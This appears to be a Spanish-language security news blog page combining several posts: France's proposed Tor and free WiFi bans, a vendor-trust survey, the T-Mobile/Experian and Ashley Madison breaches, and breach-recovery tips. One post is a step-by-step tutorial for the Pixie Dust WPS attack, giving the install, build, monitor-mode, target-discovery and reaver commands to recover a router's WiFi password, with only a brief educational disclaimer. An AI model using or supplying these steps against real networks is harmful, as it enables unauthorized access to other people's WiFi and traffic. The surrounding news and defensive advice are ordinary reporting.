El gobierno francés quiere bloquear Tor y Prohibir el Wi-Fi gratuito


En respuesta a los recientes ataques terroristas en París, el gobierno francés propone prohibir y bloquear el uso de la red anónima Tor.

En respuesta a los recientes ataques terroristas en París, el gobierno francés propone prohibir y bloquear el uso de la red anónima Tor.

De acuerdo con un documento interno del Ministerio del Interior analizado por periodistas en el periódico francés Le Monde. El documento incluye dos propuestas de legislación, uno en todo el estado de emergencia, y la otra relacionada con las medidas de lucha contra el terrorismo.
El Gobierno francés está considerando "Prohibir conexiones wi-fi gratis y compartidas", las medidas deben ser adoptadas para evitar abusos de redes Wi-Fi públicas. Para las autoridades es difícil rastrear sospechosos y terroristas que utilizan redes wi-fi públicas.

La parte más polémica de la pieza de la legislación está relacionada con la prohibición de la red Tor, la legislación podría presentarse ya en enero 2016.

¿Es Tor un instrumento malvado?

Tor es la red de anonimato más popular, que actualmente es mantenida por voluntarios. El anonimato de sus usuarios está asegurada por el encaminamiento de tráfico del usuario a través de rutas impredecibles dentro de la red de servidores que incluye, ofuscar las fuentes de datos y ocultar la dirección IP.

A la red Tor se le acusa de ser el imperio del mal, que alberga lugares como DarkMarkets donde es posible adquirir cualquier clase de productos y servicios ilegales, incluyendo drogas, pornografía infantil, armas y malware.

Pero no podemos ignorar la importancia de Tor, que permite a los periodistas, los denunciantes y personas que sólo quieren proteger su privacidad en línea y evitar la censura.

El Proyecto Tor, el equipo que en realidad mantiene la red Tor, no comentó de inmediato a la noticia.
Las autoridades chinas activamente bloquean las conexiones a la red Tor para evitar que los usuarios accedan a la red del anonimato. El bloqueo es posible impidiendo el acceso a los nodos de entrada públicos de Tor, de cualquier manera, en países donde hay un estricto control de la red, es posible utilizar los nodos de entrada no públicos, los llamados "puentes" para evitar la censura.

¿Los franceses están dispuestos a aplicar el modelo de la censura china? ¿Es constitucional? ¿Es esta una buena solución para evitar acciones terroristas?


Demos un vistazo al uso de Tor en Francia en 2015 analizando el número de usuarios conectados directos.


Enfocando el análisis en el período antes de los atentados de París, se puede observar un incremento de la conexión en octubre.


Podría haber una serie de causas responsables por el incremento, incluyendo una red de bots que utiliza la red Tor para ocultar su infraestructura C&C. De cualquier forma, en los días justo antes y después de los ataques, no hubo nada extraño.

Prohibir el acceso a la red Tor personalmente creo que es bastante tajante y afecta a mas usuarios de lo que beneficia.

En cuanto a la Wi-Fi pública, podría ser una medida razonable, pero es bastante fácil abusar de routers mal configurados o no configurados en absoluto por lo que aunque hipotéticamente seria lo ideal definitivamente es una tarea difícil por no decir imposible.

Conoce por que debes desconfíar de la seguridad de tus proveedores


La razón principal de esta pérdida de confianza radica en que estas terceras compañías son culpables del 18% de los incidentes cibernéticos sucedidos en 2015. En estos casos, el coste de un incidente puede llegar a superar los 3 millones de dólares.
computerworld.- De acuerdo con una encuesta realizada por Kaspersky Lab y B2B International, las empresas están perdiendo la confianza en terceras compañías que les proveen de servicios, debido al creciente número de incidentes de seguridad de TI que causan. La encuesta encontró que el coste medio de un incidente de este tipo para la empresa supera los 3 millones de dólares.

Según los resultados del estudio, el 37% de las empresas consultadas no confían en sus proveedores, cuatro puntos porcentuales más con respecto al año anterior (33%). Esta tendencia es la misma para las PYMES como para las grandes corporaciones. La razón principal de esta pérdida de fe en los proveedores es el hecho de que ellos son los culpables del 18% de los ciberincidentes producidos en 2015.

Los incidentes que involucran a terceras compañías no son menos peligrosas para las empresas que los ciberataques directos a la infraestructura de la empresa. En ambos casos, el coste de eliminar las consecuencias es igualmente alto. Se calcula que los ciberincidentes que involucran a proveedores cuestan a las pequeñas y medianas empresas 67.000 dólares de media, mientras que la cifra para las grandes corporaciones es de 3,2 millones de dólares.
"Con el fin de evitar daños y garantizar una comunicación segura con los proveedores, se requiere un enfoque de seguridad integral de múltiples capas. La primera cosa a hacer es fijar los derechos de acceso a las diferentes áreas de la red corporativa para diferentes empleados. Esto le ayudará a restringir el acceso de un proveedor a los recursos de la empresa. También es importante averiguar los detalles del sistema de seguridad de TI del proveedor y aplicar reglas de interacción basadas no sólo en la eficiencia y la flexibilidad, sino también en la seguridad ", explica Konstantin Voronkov, Jefe de gestión de producto Endpoint de Kaspersky Lab.

Cómo Hackear WiFi Usando el Ataque Pixie Dust sobre WPS

Para nuestros lectores que han solicitado este tutorial. Aquí están los pasos para realizar un ataque Pixie Dust para conseguir contraseña de un WiFi que tenga WPS habilitado.


Nota: Este ataque podría no funcionar bien en todos los routers, pero definitivamente vale la pena probarlo antes de usar un ataque de fuerza bruta contra WPS.

Primero, ¿Que es WPS? WPS significa Wi-Fi Protected Setup y es un estándar de red inalámbrica creada en un intento de hacer las conexiones entre un router y los dispositivos inalámbricos más rápidas y sencillas. Funciona sólo para redes inalámbricas que tienen seguridad WPA Personal o WPA2 Personal. El router al que te vas a conectar tiene un botón de WPS que presionas y también usas la misma opcion en el equipo, tablet o smartphone y puede conectarte automáticamente, en ocasiones por medio de un PIN.

Ahora al tutorial, si estas utilizando Kali Linux probablemente ya estes listo para atacar, pero si no, empieza por aqui:

Paso 1: Descarga todas las dependencias

Es importante descargar todas las dependencias del repositorio antes de proceder con el ataque. Kali Linux incluye algunas de ellas, pero si estás utilizando otra distribución de Linux, puede que no. Así que vamos a listar las que se ocupan.

En primer lugar, escribimos en el terminal:
apt-get update
apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

Es conveniente ejecutar comando por comando ya que hemos experimentado errores al tratar de combinarlos.
Paso 2: Clonar el paquete de GitHub

Este ataque funciona mediante el uso de una variante de Reaver. Vamos a tener que descargar, compilar e instalarlo . Empezamos:

git clone https://github.com/t6x/reaver-wps-fork-t6x

Paso 3: Instalación

Desde tu pwd (directorio actual en la Terminal), escribes:

cd reaver-wps-fork-t6x /
cd src/
./configure
make
make install
o "sudo make install 'si no estás firmado como 'root'

Paso 4: Modo Monitor

Pon tu interfaz en modo monitor usando 'airmon-ng start {interfaz inalámbrica} (usualmente wlan0 pero puedes averiguarlo con un ifconfig)


Paso 5: Identifica tu objetivo
La forma más fácil de encontrar un objetivo con WPS habilitado es

'wash -i {-interfaz del monitor}'

Guarda el BSSID y el numero de canal del router que quieres atacar. Asegúrese de tener una señal fuerte antes de intentar el ataque.


Paso 6: Iniciar el ataque

Una vez que hayas reunido toda la información, simplemente lanzas el siguiente comando:

reaver -i {interfaz de monitor} -b {BSSID del router} -c {canal del router} -vvv -K 1 -f


Paso 7: Voila!

Ahí está la contraseña! Una vez más, este ataque no funciona contra todos los routers, pero definitivamente es más eficaz que un ataque de fuerza bruta (Pixie Dust: máximo 30 minutos vs Brute Force: minutos a DÍAS!)


Aviso Legal: No me gusta escribir esto pero es necesario, Cronica Hacker no se hace responsable del uso de esta la información mostrada aquí, misma que es escrita con fines educativos.

Nuevo ataque deja expuestos los datos de clientes de T-Mobile


Los consumidores que se han suscrito o contratado algún servicio o dispositivo de T-Mobile desde 2013 pueden haberse visto afectados. Se calcula que 15 millones de estadounidense han visto sus datos expuestos en esta nueva brecha de Experian.

computerworld.- Los datos incluyen nombres, fechas de nacimiento, direcciones y números de la Seguridad Social o otras formas de identificación como números de carnets de conducir, según han explicado las compañías. Los afectados pueden no ser subscriptores actuales de T-Mobile pero haber solicitado el postpago de servicios o dispositivos desde septiembre de 2013 a septiembre de este año.
“Estoy increiblemente enfadado acerca de este incidente y vamos a iniciar una profunda revisión de nuestra relación con Experian”, ha comentado John Legere, CEO de T-Mobile.

De momento no hay evidencias de que los datos hayan sido utilizados de manera inapropiada, según un comunicado de Experian. La compañía ha dicho también que la base de datos de crédito no se ha visto afectada. La brecha de seguridad es la última incidencia de seguridad que afecta a Experian.

Tras ataque: Renuncia el director de Ashley Madison


Noel Biderman, director general de Avid Life Media Inc., Biderman renunció ante la revelación masiva de datos de usuarios del sitio Ashley Madison tras un ciberataque al sistema de la compañía. (Foto AP/Eugene Hoshiko, archivo)

SIPSE.- El director general de la empresa encargada del sitio Ashley Madison -que ofrece contactar a usuarios entre sí para relaciones extramaritales- renunció luego de un grave ciberataque al sistema del sitio que divulgó los datos de millones de sus usuarios.
Avid Life Media Inc. dijo el viernes que la salida de Noel Biderman es efectiva inmediatamente y que fue por decisión mutua.

"Este cambio es para beneficio de la empresa y nos permite seguir dando apoyo a nuestros miembros y empleados dedicados", dijo el comunicado de Avid Life. "Reafirmamos nuestro compromiso con nuestros clientes".

Biderman no contestó inmediatamente un correo electrónico enviado a su cuenta de trabajo para conocer su opinión.

El exdirector, quien se presentaba como "el rey de la infidelidad", hizo millones de dólares con la idea de que engañar es algo natural en la vida de los casados. El sitio cobra una tarifa cada vez que un miembro envía un mensaje a un posible amante.

Biderman ha escrito libros sobre su punto de vista acerca del adulterio, incluyendo uno publicado en 2011 titulado: "Cheaters Prosper - How Infidelity Will Save The Modern Marriage" (Los adúlteros prosperan; cómo la infidelidad salvará al matrimonio moderno). A la vez este hombre casado y padre de dos hijos ha dicho que es un esposo devoto y que su esposa por 12 años terminaría con el corazón roto si alguna vez fallara a sus votos matrimoniales.

Avid Life, una empresa privada con sede en Toronto, sumó 115 millones en ganancias el año pasado, según documentos fiscales y cifras compartidas por Biderman con Forbes.

El comunicado de la empresa agregó que se está "ajustando activamente" a la crisis por el ataque cibernético y que sigue proporcionando acceso a sus servicios. La empresa ha ofrecido una recompensa de 500 mil dólares canadienses (378 mil 204 dólares) por información que lleve al arresto de los hackers que la atacaron, y señala que sigue cooperando con autoridades internacionales en sus investigaciones.

Los hackers entraron originalmente a los sistemas de Avid Life en julio, y acusaron al sitio de llenarse de perfiles falsos y de cobrar cuotas por perfiles que ya habían sido borrados. Los ciberpiratas publicaron la información en internet un mes después de que la empresa no cumplió con sus exigencias para cerrar operaciones.

Los datos publicados -que incluyen nombres, correos electrónicos, direcciones físicas, información financiera e historial de mensajes- han llevado a una ola de demandas en Estados Unidos. También han habido reportes de intentos de extorsión y dos suicidios no confirmados, según la policía canadiense.

El ataque también reveló información de las tarjetas de crédito de empleados del gobierno estadounidense, algunos con trabajos importantes en la Casa Blanca, el Congreso y el Departamento de Justicia. Cientos de correos electrónicos revelados parecen estar relacionados también con trabajadores federales, de provincias y municipios de Canadá.

Ashley Madison, cuyo slogan es "Life is short. Have an affair" ("La vida es corta, ten un amorío") dice que tiene 40 millones de usuarios.

4 consejos para recuperarse de un ciberataque

Las violaciones de datos de alto perfil recientes hacia la Oficina de Administración de Personal (OPM), Adult Friend Finder y el Parlamento Europeo ilustran el insaciable apetito que tienen los criminales por los datos y recompensa financiera.

Fuente:We Live Security
Ser atacado, ya sea como individuo o como empresa, es una experiencia horrible, y también costosa. Los hackers a menudo se salen con dinero o datos, algunos de los cuales podrían ser sensibles como los historiales médicos y fotos privadas o mensajes. Estos datos son utilizados a veces para nuevos ataques, o simplemente vendidos a otros delincuentes en la dark web.

Pero las víctimas de estas violaciones sienten que han perdido mucho más; se sienten avergonzados, mientras que las empresas comprometidas ven a los consumidores e inversores perder la confianza en la marca, lo que resulta en la caida temporal (aveces permanente) de acciones e ingresos.
Esto es lo que puede hacer para recuperarse lo más rápido posible de un ataque cibernetico y con tu dignidad intacta.

Contacta a servicio al cliente

Si el ataque (hack) fue en Facebook, Twitter u otro proveedor de servicios en línea, debes comunicarte con su equipo de servicio al cliente tan pronto como sea posible. Estas empresas, sobre todo en el espacio de las redes sociales, son cada vez mejores en tomar medidas enérgicas contra las cuentas robadas e incluso tienen formularios en línea para rellenar si ese ha sido el caso, o si su cuenta ha estado enviando mensajes de spam o realizando descargas sospechosas.

Realiza exploraciones en tu sistema

Una vez que tu cuenta comprometida este sana y salva, bajo tu control - esperando que esto no tome demasiado tiempo - debe hacer una evaluación de seguridad en busca de archivos sospechosos u otro comportamiento extraño.Por ejemplo, supongamos que tu cuenta de Facebook fue hackeada.

Debes buscar cosas, incluyendo si las preguntas de seguridad se han cambiado. Si el servicio afectado es un proveedor de comercio electrónico, como PayPal o eBay, debes comprobar para asegurarse de que no se han añadido nuevos detalles de envío o detalles del pago.
Si el hack afecta a tu correo electrónico, es posible comprobar los borradores o los correos electrónicos enviados, y hacia donde fueron enviados, mientras que los usuarios más avanzados deben revisar el código, el tráfico, ancho de banda de Internet y buscar irregularidades de correo electrónico.

Debes, por supuesto, cambiar tu contraseña tan pronto como sospeches que has sido hackeado y después realizar un análisis completo de tu sistema, mientras que también se debe considerar las aplicaciones que se conectan a esta cuenta, y si alguno de ellos podría dar a los hackers una forma de entrar.

Por ejemplo, el estándar de autenticación OAuth de código abierto ahora es utilizado por Facebook, Twitter, Microsoft, Google y otros para la conexión a un número de sitios de terceros. Es una manera más fácil y más rápida de iniciar sesión en un sitio, todo el tiempo sin compartir las credenciales de usuario (nombre de usuario y contraseña).

Pero lo que si tu cuenta de Facebook fue hackeada, ¿podrían estar también en riesgo los servicios de conexión de terceros? ¿estos plug-ins de terceros, que puede utilizar su cuenta de Facebook para iniciar sesión son suficientemente seguros o podrían estar en peligro?

Estas son buenas preguntas que hacer. Debes eliminar aplicaciones de terceros que son innecesarias y riesgosas - y esto también aplica para las aplicaciones que posiblemente hayas descargado en su teléfono inteligente o tableta.

Entiende lo básico y ejecutalo

Después de haber sido atacado, es necesario asegurarse de entender lo básico. Por ejemplo, asegúrate de cambiar las contraseñas a menudo - el uso de contraseñas complejas o un administrador de contraseñas, cuando sea posible, mientras que es posible que desee considerar el uso de la autenticación de dos factores (2FA) y una solución antivirus.

Parches regularmente en productos de software es también esencial, asi como lo son la copia de seguridad de sus datos, mientras que es posible que desees considerar la cantidad de información que publicas en medios de comunicación social, phishing e ingeniería social son a menudo la forma en que los hackers comprometen a sus víctimas.

Se cuidadoso en quien confías

¿En quién confías? Esa es una gran pregunta que nunca se sabe quién está detrás de otros equipos. Así que de ahora en adelante, considerar cuidadosamente las personas con las que desea trabajar, y piensan que son las fuentes más confiables y seguras.


Pero sobre todo confía en tus instintos, si algo se ve dudoso no lo abras, si no lo conoces no lo aceptes, configura privados tus perfiles sociales.
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular